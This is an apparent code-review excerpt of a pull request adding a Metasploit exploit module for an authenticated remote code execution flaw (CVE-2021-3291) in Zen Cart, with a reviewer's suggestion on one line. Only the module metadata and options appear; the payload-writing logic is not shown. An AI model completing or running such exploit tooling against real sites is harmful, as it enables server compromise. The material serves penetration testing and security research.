modules/exploits/linux/http/zencart_authenticated_rce.rb

```diff
@@ -0,0 +1,205 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+#
+# This exploit  write payload in database and trig to command
+# a bug in an zencart v1.7.5b web application
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'zencart authenticated remote code execution exploit',
+        'Description' => %q{
+          This exploit module execution os command in zencart.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Mucahit Saratar <trregen222@gmail.com>'], # msf module & research & poc
+        'References' => [
+          [ 'OSVDB', '' ],
+          [ 'EDB', '' ],
+          [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
+          [ 'CVE', '2021-3291']
+        ],
+        'Platform' => 'php',
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [ ['Automatic', {}] ],
+        'DisclosureDate' => '2021-01-22',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ true, 'Password to login with', '']),
+        OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
+        OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
+        OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
+        OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
+      ], self.class
```

Comment:
This is no longer used.

```suggestion
      ]
```